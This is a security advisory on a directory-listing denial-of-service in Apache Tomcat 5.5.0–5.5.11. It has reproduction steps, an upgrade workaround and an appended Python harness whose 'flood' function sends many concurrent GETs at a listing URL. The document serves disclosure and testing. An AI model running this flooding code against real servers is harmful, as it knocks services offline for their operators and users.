Apache Tomcat is the well-known servlet container for the Java Servlet and JSP technologies, released under the Apache Software License. The 5.5.x branch implements the Servlet 2.4 / JSP 2.0 specifications. More information at http://tomcat.apache.org/

Description:
Directory listing requests are expensive for the server to render, so many concurrent requests for the listing of a large directory can cause a denial of service. The listing is produced by Tomcat's DefaultServlet and is only served where its "listings" init parameter in conf/web.xml is true; where listings are not needed, setting it to false removes the attack surface.

Detection/PoC:
Tested on Linux. Vulnerable versions tested are 5.5.0 to 5.5.11; 5.5.12 and 5.0.28 do not appear to be affected. An easy way to test:
- Download a Tomcat package from the Tomcat archive
- Unpack it and use the default configuration
- In the examples directory under webapps, add some empty files (enough for the directory listing request to take a noticeable time)
- From many threads, request the listing of that directory concurrently

Workaround:
Upgrade to version 5.5.12.

PS: The Secunia team has done more tests, available at http://secunia.com/advisories/17416/

David Maciejak
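The reproduction procedure above, as an added example that is not part of the original advisory and not Tomcat project code: a small Python harness that populates a directory with many empty files and then fires concurrent GETs at a listing URL while timing them. So that it runs offline, it can start a stand-in server (Python's http.server, which also renders directory listings) in place of Tomcat; that stand-in says nothing about Tomcat's behaviour and is only there to exercise the harness. The file count, request count, thread count and the target URL are all assumptions to be adjusted; to reproduce the advisory, point `flood()` at the listing URL of a directory you populated under webapps on a Tomcat 5.5.0 to 5.5.11 test instance with listings enabled, and compare the per-request latency against a 5.5.12 install.

```python
"""Harness for the directory-listing DoS reproduction described in the advisory.

Added example; not the advisory author's or the Tomcat project's code.
"""
import os
import tempfile
import threading
import time
import urllib.error
import urllib.request
from concurrent.futures import ThreadPoolExecutor
from functools import partial
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer


def populate(directory, count):
    """Create `count` empty files so the directory listing is costly to render."""
    for i in range(count):
        open(os.path.join(directory, f"f{i:05d}.txt"), "w").close()
    return count


def fetch(url, timeout):
    """One listing request. Returns (http_status, body_length, seconds).

    A status of 0 means the connection failed or timed out, which is what
    a successful DoS looks like from the client side.
    """
    started = time.perf_counter()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            body = resp.read()
            return resp.status, len(body), time.perf_counter() - started
    except urllib.error.HTTPError as exc:
        return exc.code, 0, time.perf_counter() - started
    except (urllib.error.URLError, OSError):
        return 0, 0, time.perf_counter() - started


def flood(target_url, requests=200, workers=20, timeout=10):
    """Fire `requests` GETs at `target_url` from `workers` threads at once.

    Returns status counts, total wall time and the slowest single request;
    on a vulnerable server the latency climbs steeply as listings queue up.
    """
    started = time.perf_counter()
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = list(pool.map(lambda _: fetch(target_url, timeout), range(requests)))
    status_counts = {}
    for status, _, _ in results:
        status_counts[status] = status_counts.get(status, 0) + 1
    return {
        "status_counts": status_counts,
        "ok": status_counts.get(200, 0),
        "wall_seconds": time.perf_counter() - started,
        "slowest_seconds": max(seconds for _, _, seconds in results),
    }


class _QuietHandler(SimpleHTTPRequestHandler):
    """Stand-in listing server (assumption: NOT Tomcat), with logging silenced."""

    def log_message(self, *args):
        pass


def serve_directory(directory):
    """Start the stand-in server on a free loopback port.

    Returns (base_url, server); call server.shutdown() when done.
    """
    server = ThreadingHTTPServer(("127.0.0.1", 0), partial(_QuietHandler, directory=directory))
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return f"http://127.0.0.1:{server.server_address[1]}/", server


def demo(file_count=2000, requests=200, workers=20):
    """Offline end-to-end run: populate a temp dir, serve it, flood the listing URL."""
    with tempfile.TemporaryDirectory() as tmp:
        populate(tmp, file_count)
        base_url, server = serve_directory(tmp)
        try:
            return flood(base_url, requests=requests, workers=workers)
        finally:
            server.shutdown()
            server.server_close()


if __name__ == "__main__":
    print(demo())
```

Against the stand-in server every request comes back 200 quickly, which is the baseline to compare with; against a vulnerable Tomcat the interesting numbers are "slowest_seconds" and any non-200 or status-0 entries appearing as the thread count grows.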